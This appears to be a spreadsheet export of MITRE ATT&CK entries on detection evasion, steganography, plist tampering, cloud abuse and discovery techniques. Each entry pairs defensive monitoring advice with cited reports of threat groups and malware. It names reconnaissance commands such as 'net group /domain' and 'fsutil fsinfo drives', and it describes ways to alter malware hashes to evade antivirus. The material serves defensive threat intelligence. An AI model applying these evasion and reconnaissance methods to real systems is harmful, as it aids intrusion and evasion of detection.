The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors edited variable names within the [Impacket](https://attack.mitre.org/software/S0357) suite to avoid automated detection.(Citation: FoxIT Wocao December 2019)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has been known to remove indicators of compromise from tools.(Citation: APT3 Adversary Emulation Plan)
Deep Panda
[Deep Panda](https://attack.mitre.org/groups/G0009) has updated and modified its malware, resulting in different hash values that evade detection.(Citation: Symantec Black Vine)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) ensured each payload had a unique hash, including by using different types of packers.(Citation: Cybereason Soft Cell June 2019)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.(Citation: Palo Alto OilRig April 2017)(Citation: Unit42 OilRig Nov 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) apparently altered [NDiskMonitor](https://attack.mitre.org/software/S0272) samples by adding four bytes of random letters in a likely attempt to change the file hashes.(Citation: TrendMicro Patchwork Dec 2017)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates.(Citation: FireEye TEMP.Veles 2018)
Turla
Based on comparison of [Gazer](https://attack.mitre.org/software/S0168) versions, [Turla](https://attack.mitre.org/groups/G0010) made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.(Citation: ESET Gazer Aug 2017)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) includes a capability to modify the Beacon payload to eliminate known signatures or unpacking methods.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)
Daserf
Analysis of [Daserf](https://attack.mitre.org/software/S0187) has shown that it regularly undergoes technical improvements to evade anti-virus detection.(Citation: Trend Micro Daserf Nov 2017)
GravityRAT
The author of [GravityRAT](https://attack.mitre.org/software/S0237) submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.(Citation: Talos GravityRAT)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has undergone regular technical improvements in an attempt to evade detection.(Citation: ESET InvisiMole June 2020)
Penquin
[Penquin](https://attack.mitre.org/software/S0587) can remove strings from binaries.(Citation: Leonardo Turla Penquin May 2020)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Find-AVSignature&lt;/code&gt; AntivirusBypass module can be used to locate single byte anti-virus signatures.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can make small changes to itself in order to change its checksum and hash value.(Citation: Crowdstrike Qakbot October 2020)(Citation: Cyberint Qakbot May 2021)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to [SUNSPOT](https://attack.mitre.org/software/S0562).(Citation: CrowdStrike SUNSPOT Implant January 2021) 
Waterbear
[Waterbear](https://attack.mitre.org/software/S0579) can scramble functions not to be executed again with random values.(Citation: Trend Micro Waterbear December 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Detecting the presence of stripped payloads may be difficult and unwarranted in real-time, though analyzing contextual data about files (such as content and character entropy) may highlight attempts at obfuscation.
macOS.OSAMiner
[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used run-only Applescripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to remove human readable indicators to evade detection.(Citation: SentinelLabs reversing run-only applescripts 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for commands with arguments (such as opening common command-line editors) used to modify plist files, especially commonly abused files such as those in &lt;code&gt;\~/LaunchAgents&lt;/code&gt;, &lt;code&gt;\~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;, and an application's &lt;code&gt;Info.plist&lt;/code&gt;.
File Modification
Monitor for plist file modification, especially if immediately followed by other suspicious events such as code execution from &lt;code&gt;\~/Library/Scripts&lt;/code&gt; or &lt;code&gt;\~/Library/Preferences&lt;/code&gt;. Also, monitor for significant changes to any path pointers in a modified plist.
Process Creation
Monitor for newly executed processes with arguments that can modify property list (plist) files.
Application Developer Guidance
Ensure applications are using Apple's developer guidance which enables hardened runtime.(Citation: Apple Developer Doco Hardened Runtime)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses the &lt;code&gt;plutil&lt;/code&gt; command to modify the &lt;code&gt;LSUIElement&lt;/code&gt;, &lt;code&gt;DFBundleDisplayName&lt;/code&gt;, and &lt;code&gt;CFBundleIdentifier&lt;/code&gt; keys in the &lt;code&gt;/Contents/Info.plist&lt;/code&gt; file to change how [XCSSET](https://attack.mitre.org/software/S0658) is visible on the system.(Citation: trendmicro xcsset xcode project 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Credential Access Protection
Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats.  Ensure that, where available, local passwords are always encrypted, per vendor recommendations.(Citation: Cisco IOS Software Integrity Assurance - AAA)
Filter Network Traffic
Upon identifying a compromised network device being used to bridge a network boundary, block the malicious packets using an unaffected network device in path, such as a firewall or a router that has not been compromised.  Continue to monitor for additional activity and to ensure that the blocks are indeed effective.
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)
Password Policies
Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)
Privileged Account Management
Restrict administrator accounts to as few individuals as possible, following least privilege principles.  Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.
Operation Ghost
During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used steganography to hide payloads inside valid images.(Citation: ESET Dukes October 2019)
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used packers that read pixel data from images contained in PE files' resource sections and build the next layer of execution from the data.(Citation: ESET Operation Spalax Jan 2021)
APT37
[APT37](https://attack.mitre.org/groups/G0067) uses steganography to send images to users that are embedded with shellcode.(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has hidden malicious executables within PNG files.(Citation: MalwareBytes Lazarus-Andariel Conceals Code April 2021)(Citation: Kaspersky Andariel Ransomware June 2021)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used steganography in multiple operations to conceal malicious payloads.(Citation: Trend Micro Tick November 2019)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used steganography to hide shellcode in a BMP image file.(Citation: TrendMicro EarthLusca 2022)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used steganography to hide stolen data inside other files stored on Github.(Citation: CISA AA21-200A APT40 July 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has stored obfuscated JavaScript code in an image file named temp.jpg.(Citation: ClearSky MuddyWater Nov 2018)
TA551
[TA551](https://attack.mitre.org/groups/G0127) has hidden encoded data for malware DLLs in a PNG.(Citation: Unit 42 TA551 Jan 2021)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used JPG files with encrypted payloads to mask their backdoor routines and evade detection.(Citation: TrendMicro Tropic Trooper May 2020)
ABK
[ABK](https://attack.mitre.org/software/S0469) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) can extract backdoor malware from downloaded images.(Citation: Trend Micro Tick November 2019)
BBK
[BBK](https://attack.mitre.org/software/S0470) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has used .PNG images within a zip file to build the executable. (Citation: CheckPoint Bandook Nov 2020)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) has obfuscated its main code routines within bitmap images as part of its anti-analysis techniques.(Citation: Fortinet Diavol July 2021) 
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has embedded binaries within RC4 encrypted .png files.(Citation: Juniper IcedID June 2020)
Invoke-PSImage
[Invoke-PSImage](https://attack.mitre.org/software/S0231) can be used to embed a PowerShell script within the pixels of a PNG file.(Citation: GitHub Invoke-PSImage)
LiteDuke
[LiteDuke](https://attack.mitre.org/software/S0513) has used image files to hide its loader component.(Citation: ESET Dukes October 2019)
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) can hide its payload in BMP images hosted on compromised websites.(Citation: Talos Oblique RAT March 2021)
Okrum
[Okrum](https://attack.mitre.org/software/S0439)'s payload is encrypted and embedded within its loader, or within a legitimate PNG file.(Citation: ESET Okrum July 2019)
PolyglotDuke
[PolyglotDuke](https://attack.mitre.org/software/S0518) can use steganography to hide C2 information in images.(Citation: ESET Dukes October 2019)
PowerDuke
[PowerDuke](https://attack.mitre.org/software/S0139) uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).(Citation: Volexity PowerDuke November 2016) 
ProLock
[ProLock](https://attack.mitre.org/software/S0654) can use .jpg and .bmp files to store its payload.(Citation: Group IB Ransomware September 2020)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) can also embed data within a BMP image prior to exfiltration.(Citation: Unit42 RDAT July 2020)	
Raindrop
[Raindrop](https://attack.mitre.org/software/S0565) used steganography to locate the start of its encoded payload within legitimate 7-Zip code.(Citation: Symantec RAINDROP January 2021)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) has PE data embedded within JPEG files contained within Word documents.(Citation: Antiy CERT Ramsay April 2020)
RegDuke
[RegDuke](https://attack.mitre.org/software/S0511) can hide data in images, including use of the Least Significant Bit (LSB).(Citation: ESET Dukes October 2019)
build_downer
[build_downer](https://attack.mitre.org/software/S0471) can extract malware from a downloaded JPEG.(Citation: Trend Micro Tick November 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Instance Creation
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search) (Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)
Instance Metadata
Periodically baseline instances to identify malicious modifications or additions.
Audit
Routinely check user permissions to ensure only the expected users have the capability to create new instances.
User Account Management
Limit permissions for creating new instances in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used access to the victim's Azure tenant to create Azure VMs.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets.(Citation: MSTIC DEV-0537 Mar 2022) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Enumeration
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.(Citation: AADInternals Documentation)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can enumerate AWS services, such as CloudTrail and CloudWatch.(Citation: GitHub Pacu)
ROADTools
[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD applications and service principals.(Citation: Roadtools)	
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Storage Access
Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.
Cloud Storage Enumeration
Monitor cloud logs for API calls used for file or object enumeration for unusual activity. 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
User Account Management
Restrict granting of permissions related to listing objects in cloud storage to necessary accounts.
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can enumerate AWS storage services, such as S3 buckets and Elastic Block Store volumes.(Citation: GitHub Pacu)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can list AWS S3 buckets.(Citation: Peirates GitHub)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to gather information about attached peripheral devices and components connected to a computer system.
OS API Execution
Monitor for API calls that may attempt to gather information about attached peripheral devices and components connected to a computer system.
Process Creation
Monitor for newly executed processes that may attempt to gather information about attached peripheral devices and components connected to a computer system.
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `fsutil fsinfo drives` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered removable disks attached to a system.(Citation: FoxIT Wocao December 2019)
APT28
[APT28](https://attack.mitre.org/groups/G0007) uses a module to receive a notification every time a USB mass storage device is inserted into a victim.(Citation: Microsoft SIR Vol 19)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices. (Citation: Securelist ScarCruft May 2019)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has used an executable to detect removable media, such as USB flash drives.(Citation: ESET BackdoorDiplomacy Jun 2021)
Equation
[Equation](https://attack.mitre.org/groups/G0020) has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.(Citation: Kaspersky Equation QA)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have contained an application to check performance of USB flash drives. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also used malware to scan for removable drives.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used tools to identify if a mouse is connected to a targeted system.(Citation: Check Point APT34 April 2021)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for attached VGA devices using lspci.(Citation: Cisco Talos Intelligence Group)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;fsutil fsinfo drives&lt;/code&gt; to list connected drives.(Citation: ESET ComRAT May 2020)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list connected devices.(Citation: ESET Sednit Part 2)
Attor
[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects information about inserted storage devices, modems, and phone devices.(Citation: ESET Attor Oct 2019)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) can detect USB devices.(Citation: EFF Manul Aug 2016)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) can gather very specific information about attached USB devices, to include device instance ID and drive geometry.(Citation: Securelist BlackEnergy Nov 2014)
Cadelspy
[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal information about printers and the documents sent to printers.(Citation: Symantec Chafer Dec 2015)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) has the ability to discover pluggable/removable drives to extract files from.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) can monitor for removable drives being plugged into the compromised machine.(Citation: ESET Crutch December 2020)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can list signed PnP drivers for smartcard readers.(Citation: Prevailion DarkWatchman 2021)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) can detect connected USB devices.(Citation: Kaspersky MoleRATs April 2019)
Ferocious
[Ferocious](https://attack.mitre.org/software/S0679) can run &lt;code&gt;GET.WORKSPACE&lt;/code&gt; in Microsoft Excel to check if a mouse is present.(Citation: Kaspersky WIRTE November 2021)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect if a usable smart card is current inserted into a card reader.(Citation: Proofpoint TA505 Mar 2018)
FunnyDream
The [FunnyDream](https://attack.mitre.org/software/S1044) FilepakMonitor component can detect removable drive insertion.(Citation: Bitdefender FunnyDream Campaign November 2020)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can identify removable media attached to victim's machines.(Citation: SentinelOne Aoqin Dragon June 2022)
Machete
[Machete](https://attack.mitre.org/software/S0409) detects the insertion of new devices by listening for the WM_DEVICECHANGE window message.(Citation: ESET Machete July 2019)  
Mongall
[Mongall](https://attack.mitre.org/software/S1026) can identify removable media attached to compromised hosts.(Citation: SentinelOne Aoqin Dragon June 2022)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) obtains the number of removable drives from the victim.(Citation: Palo Alto MoonWind March 2017)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) has the ability to monitor removable drives.(Citation: MoustachedBouncer ESET August 2023)
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) can discover pluggable/removable drives to extract files from.(Citation: Talos Oblique RAT March 2021)
Prikormka
A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information on available printers and disk drives.(Citation: ESET Operation Groundbait)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can identify peripheral devices on targeted systems.(Citation: Trend Micro Qakbot May 2020)
QuietSieve
[QuietSieve](https://attack.mitre.org/software/S0686) can identify and search removable drives for specific file name extensions.(Citation: Microsoft Actinium February 2022)
RTM
[RTM](https://attack.mitre.org/software/S0148) can obtain a list of smart card readers attached to the victim.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) may attempt to connect to removable drives and mapped network drives.(Citation: Sophos Ragnar May 2020)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can scan for removable media which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can check for the number of devices plugged into an infected host.(Citation: HP SVCReady Jun 2022)
SharpDisco
[SharpDisco](https://attack.mitre.org/software/S1089) has dropped a plugin to monitor external drives to `C:\Users\Public\It3.exe`.(Citation: MoustachedBouncer ESET August 2023)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) enumerates removable drives for infection.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
T9000
[T9000](https://attack.mitre.org/software/S0098) searches through connected drives for removable storage devices.(Citation: Palo Alto T9000 Feb 2016)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify connected Apple devices.(Citation: Kaspersky TajMahal April 2019)
Turian
[Turian](https://attack.mitre.org/software/S0647) can scan for removable media to collect data.(Citation: ESET BackdoorDiplomacy Jun 2021)
USBStealer
[USBStealer](https://attack.mitre.org/software/S0136) monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.(Citation: ESET Sednit USBStealer 2014)
USBferry
[USBferry](https://attack.mitre.org/software/S0452) can check for connected USB devices.(Citation: TrendMicro Tropic Trooper May 2020)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device.(Citation: FireEye WannaCry 2017)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) can enumerate removable drives prior to the encryption process.(Citation: Sentinel Labs WastedLocker July 2020)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) enumerates information about connected storage devices.(Citation: Unit42 Cannon Nov 2018)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can map UPnP ports.(Citation: Kaspersky Adwind Feb 2016)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) will attempt to detect if the victim system has a camera during the initial infection. [njRAT](https://attack.mitre.org/software/S0385) can also detect any removable drives connected to the system.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for logging, messaging, and other artifacts provided by cloud services.
Command Execution
Monitor executed commands and arguments acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
Group Enumeration
Monitor for an extracted list of ACLs of available groups and/or their associated settings.
Group Metadata
Monitor for contextual data about a group which describes group and activity around it.
Process Creation
Monitor for newly constructed processes and/or command-lines for actions that could be taken to gather system and network information. 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SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used the `Get-ManagementRoleAssignment` PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.(Citation: Volexity SolarWinds)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that can enumerate the permissions associated with Windows groups.(Citation: Symantec Buckeye)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has enumerated all users and roles from a victim's main treasury system.(Citation: Mandiant FIN13 Aug 2022)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used TinyMet to enumerate members of privileged groups.(Citation: IBM TA505 April 2020) [TA505](https://attack.mitre.org/groups/G0092) has also run &lt;code&gt;net group /domain&lt;/code&gt;.(Citation: Trend Micro TA505 June 2019)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net group&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has the ability to identify Workgroup membership.(Citation: IBM IcedID November 2017)
MURKYTOP
[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about groups.(Citation: FireEye Periscope March 2018)
ShimRatReporter
[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local privileges for the infected host.(Citation: FOX-IT May 2016 Mofang)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) checks for Kubernetes node permissions.(Citation: Unit 42 Siloscape Jun 2021)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can identify the groups the user on a compromised host belongs to.(Citation: Cyberreason Anchor December 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for execution of commands and arguments associated with enumeration or information gathering of email addresses and accounts such as &lt;code&gt;Get-AddressList&lt;/code&gt;, &lt;code&gt;Get-GlobalAddressList&lt;/code&gt;, and &lt;code&gt;Get-OfflineAddressBook&lt;/code&gt;.
Process Creation
Monitor for newly executed processes, such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001) , with arguments that can be used to enumerate email addresses and accounts.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) accessed Azure AD to identify email addresses.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used Powershell to discover email accounts.(Citation: DFIR Report APT35 ProxyShell March 2022)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) used malware to enumerate email settings, including usernames and passwords, from the M.E.Doc application.(Citation: ESET Telebots July 2017)	
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.(Citation: Trend Micro TA505 June 2019)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects address book information from Outlook.(Citation: Symantec Dragonfly)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can execute an LDAP query to discover e-mail accounts for domain users.(Citation: MSTIC Nobelium Toolset May 2021)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that can scrape email addresses from Outlook.(Citation: CIS Emotet Dec 2018)(Citation: IBM IcedID November 2017)(Citation: Binary Defense Emotes Wi-Fi Spreader)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can parse Outlook .pst files to extract e-mail addresses.(Citation: ESET Grandoreiro April 2020)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can collect email accounts from Microsoft Outlook and Mozilla Thunderbird.(Citation: BiZone Lizar May 2021) 
MailSniper
[MailSniper](https://attack.mitre.org/software/S0413) can be used to obtain account names from Exchange and Office 365 using the &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; cmdlet.(Citation: Black Hills Attacking Exchange MailSniper, 2016)
Ruler
[Ruler](https://attack.mitre.org/software/S0358) can be used to enumerate Exchange users and dump the GAL.(Citation: SensePost Ruler GitHub)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) collects email addresses from Outlook.(Citation: Trend Micro Trickbot Nov 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may check for Internet connectivity on compromised systems.
Process Creation
Monitor for executed processes (such as tracert or ping) that may check for Internet connectivity on compromised systems.
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used a Visual Basic script that checked for internet connectivity.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used [GoldFinder](https://attack.mitre.org/software/S0597) to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.(Citation: MSTIC NOBELIUM Mar 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has ensured web servers in a victim environment are Internet accessible before copying tools or malware to it.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used `Ping` and `tracert` for network reconnaissance efforts.(Citation: Mandiant FIN13 Aug 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used the [Ping](https://attack.mitre.org/software/S0097) command to check connectivity to actor-controlled C2 servers.(Citation: Bitdefender Sardonic Aug 2021) 
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has tested connectivity between a compromised machine and a C2 server using  [Ping](https://attack.mitre.org/software/S0097) with commands such as `CSIDL_SYSTEM\cmd.exe /c ping -n 1`.(Citation: Symantec Shuckworm January 2022)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has checked for network connectivity from a compromised host using `ping`, including attempts to contact `google[.]com`.(Citation: Rapid7 HAFNIUM Mar 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used tools including [BITSAdmin](https://attack.mitre.org/software/S0190) to test internet connectivity from compromised hosts.(Citation: Kaspersky Lyceum October 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has conducted a network call out to a specific website as part of their initial discovery activity.(Citation: DFIR Phosphorus November 2021) 
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has run scripts to check internet connectivity from compromised hosts. (Citation: Cisco Operation Layover September 2021)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;tracert&lt;/code&gt; to check internet connectivity.(Citation: ESET ComRAT May 2020)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can check for internet connectivity by issuing HTTP GET requests.(Citation: Secureworks DarkTortilla Aug 2022)
GoldFinder
[GoldFinder](https://attack.mitre.org/software/S0597) performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.(Citation: MSTIC NOBELIUM Mar 2021)
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) has used HTTP GET requests to check internet connectivity.(Citation: Security Intelligence More Eggs Aug 2019)
Neoichor
[Neoichor](https://attack.mitre.org/software/S0691) can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=&lt;GetTickCount&gt;`.(Citation: Microsoft NICKEL December 2021)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can measure the download speed on a targeted host.(Citation: Kaspersky QakBot September 2021)
QuietSieve
[QuietSieve](https://attack.mitre.org/software/S0686) can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS).(Citation: Microsoft Actinium February 2022)
Rising Sun
[Rising Sun](https://attack.mitre.org/software/S0448) can test a connection to a specified network IP address over a specified port number.(Citation: McAfee Sharpshooter December 2018)
SUGARUSH
[SUGARUSH](https://attack.mitre.org/software/S1049) has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.(Citation: Mandiant UNC3890 Aug 2022)
SysUpdate
